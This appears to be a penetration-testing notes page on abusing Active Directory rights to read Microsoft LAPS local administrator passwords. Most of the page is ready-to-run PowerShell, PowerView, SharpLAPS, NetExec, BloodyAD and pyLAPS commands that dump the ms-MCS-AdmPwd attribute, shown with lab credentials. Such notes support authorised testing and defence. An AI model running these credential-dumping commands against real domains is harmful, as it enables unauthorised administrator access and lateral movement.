# ReadLAPSPassword Microsoft [Local Administrator Password Solution (LAPS)](https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview) is a Windows security feature designed to manage and protect local administrator credentials on domain-joined systems. It automatically generates strong, random passwords for local administrator accounts and rotates them regularly, with a default rotation period of 30 days. Each managed device runs a LAPS client that periodically updates the local administrator password. After the password is changed, it is securely stored in Active Directory as an attribute of the corresponding computer object. In the legacy implementation, this attribute is called `ms-MCS-AdmPwd`. Administrators can retrieve the current password using the LAPS management interface or PowerShell. Access to this information is strictly controlled: only users or groups with explicit permission to read the attribute are able to view the stored password. An attacker can access the `ms-MCS-AdmPwd` attribute if they compromise an account that directly has this permission or has either `GenericAll` or `AllExtendedRights` rights over a target computer configured with LAPS. ### Windows The LAPS password can be read using the PowerShell cmdlets, PowerView, or [SharpLAPS](https://github.com/swisskyrepo/SharpLAPS). {% code overflow="wrap" %} ```powershell # Active Directory PowerShell module Get-ADComputer -Identity DC01 -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' # PowerView Get-DomainComputer "DC01" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' # SharpLAPS SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1" # Enumerate all LAPS-enabled hosts (PowerView) Get-DomainComputer -Properties name | ForEach-Object {$computer=$_.name $obj=Get-DomainObject -Identity $computer -Properties "ms-mcs-AdmPwd",name -ErrorAction SilentlyContinue if($obj.'ms-mcs-AdmPwd'){Write-Output "$computer`: $($obj.'ms-mcs-AdmPwd')"}} ``` {% endcode %} ### Linux The LAPS password can be read from a Linux host via [NetExec](https://github.com/Pennyw0rth/NetExec), [BloodyAD](https://github.com/CravateRouge/bloodyAD), [pyLAPS](https://github.com/p0dalirius/pyLAPS), or [LAPSDumper](https://github.com/n00py/LAPSDumper). {% code overflow="wrap" %} ```bash #---------# # NetExec # #---------# # Read the password of all computers (or specify a target host) nxc ldap 10.10.10.5 -u x7331 -p 'Passw0rd123!' -M laps [-o COMPUTER='DC01$'] pyLAPS.py --action get [--computer 'DC01$'] -u x7331 -d marvel.local -p 'Passw0wrd123!' --dc-ip 10.10.10.5 # BloodyAD bloodyAD -u x7331 -d marvel.local -p 'Passw0rd123!' --host 10.10.10.5 get object 'DC01$' --attr ms-Mcs-AdmPwd # Basic usage python laps.py -u x7331 -p 'Passw0rd123!' -d marvel.local # PtH on specific LDAP server python laps.py -u x7331 -p -d marvel.local -l dc01.marvel.local ``` {% endcode %} For an example of reading the LAPS password with NetExec, see [Timelapse](https://x7331.gitbook.io/boxes/boxes/easy/timelapse#laps).